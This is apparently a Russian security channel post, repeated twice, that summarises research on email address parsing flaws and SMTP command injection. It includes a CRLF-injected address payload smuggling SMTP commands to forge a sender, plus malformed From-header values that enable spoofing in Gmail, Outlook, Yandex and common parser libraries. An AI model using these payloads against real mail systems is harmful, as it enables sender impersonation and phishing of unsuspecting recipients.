❔ #заметки #offense
➡️Дополнительно разберёмся в кейсах, описанных в статье @slonser_notes, и в извлекаемом из них импакте!
🧩 ‟Old new email attacks” [ 🐍 / 💻 / 💻 ] ⚡️
📌 ГЛАВНЫЕ ПОИНТЫ
▪️Пробуйте общаться с почтовыми сервисами по SMTP:
Gmail: smtp.gmail.com
Outlook: smtp-mail.outlook.com
Yandex: smtp.yandex.ru
Mail.Ru: smtp.mail.ru
...
SSL port: 465
TLS port: 587
▪️Пробуйте разные входные точки:
From: EMAIL
From:
From: "NAME"
From: (COMMENT)
From: GROUP: EMAIL, EMAIL
From: GROUP:
Sender: EMAIL
▪️Оказались уязвимы почтовые продукты Google, Microsoft, Yandex, ...
▪️Оказались уязвимы парсеры адресов электронных почт, библиотеки ЯП:
▪️Python [email]
▪️JS [addressparser, email-addresses]
▪️C# [System.Net.Mail]
▪️Go [net/mail]
▪️Rust, Ruby, PHP, ...
🔑 ПЕЙЛОАДЫ НА ПРОБУ
...➡️...
attacker@[testText\r\nRSET\r\nMAIL FROM: \r\nRCPT TO: \r\nDATA\r\nFrom: spoofed@example.org\r\n\r\nText\r\n.\r\nQUIT\r\n]
📧➡️📧
"Spoofed"
: spoofed@outlook.com
📧➡️📧, 📧, ...
"spoofed"
📧➡️📧, 📧
Attacker
:
📧➡️...
": ""
☠️ ИМПАКТ & ПОСЛЕДСТВИЯ
▪️Возможность внедрения конструкции CRLF (\r\n) для внедрения SMTP команд➡️Имперсонация, ...
▪️Некорректный парсинг адреса электронной почты отправителя➡️Имперсонация
💬 Поскольку вендоры считают перечисленные уязвимости фичами, возможность эксплуатации сохраняет актуальность и уже сейчас мы можем наблюдать, как, например, этими "фичами" начинают пользоваться хактивисты для проведения качественных фишинговых рассылок;
➡️Stay safe.
@HaHacking 🐇
➡️Дополнительно разберёмся в кейсах, описанных в статье @slonser_notes, и в извлекаемом из них импакте!
🧩 ‟Old new email attacks” [ 🐍 / 💻 / 💻 ] ⚡️
📌 ГЛАВНЫЕ ПОИНТЫ
▪️Пробуйте общаться с почтовыми сервисами по SMTP:
Gmail: smtp.gmail.com
Outlook: smtp-mail.outlook.com
Yandex: smtp.yandex.ru
Mail.Ru: smtp.mail.ru
...
SSL port: 465
TLS port: 587
▪️Пробуйте разные входные точки:
From: EMAIL
From:
From: "NAME"
From: (COMMENT)
From: GROUP: EMAIL, EMAIL
From: GROUP:
Sender: EMAIL
▪️Оказались уязвимы почтовые продукты Google, Microsoft, Yandex, ...
▪️Оказались уязвимы парсеры адресов электронных почт, библиотеки ЯП:
▪️Python [email]
▪️JS [addressparser, email-addresses]
▪️C# [System.Net.Mail]
▪️Go [net/mail]
▪️Rust, Ruby, PHP, ...
🔑 ПЕЙЛОАДЫ НА ПРОБУ
...➡️...
attacker@[testText\r\nRSET\r\nMAIL FROM: \r\nRCPT TO: \r\nDATA\r\nFrom: spoofed@example.org\r\n\r\nText\r\n.\r\nQUIT\r\n]
📧➡️📧
"Spoofed"
: spoofed@outlook.com
📧➡️📧, 📧, ...
"spoofed"
📧➡️📧, 📧
Attacker
:
📧➡️...
": ""
☠️ ИМПАКТ & ПОСЛЕДСТВИЯ
▪️Возможность внедрения конструкции CRLF (\r\n) для внедрения SMTP команд➡️Имперсонация, ...
▪️Некорректный парсинг адреса электронной почты отправителя➡️Имперсонация
❗️Имперсонация➡️(в данном случае) Подделка адреса электронной почты отправителя; Обеспечивает кратное повышение легитимности фишинговых писем в глазах атакуемых
💬 Поскольку вендоры считают перечисленные уязвимости фичами, возможность эксплуатации сохраняет актуальность и уже сейчас мы можем наблюдать, как, например, этими "фичами" начинают пользоваться хактивисты для проведения качественных фишинговых рассылок;
➡️Stay safe.
@HaHacking 🐇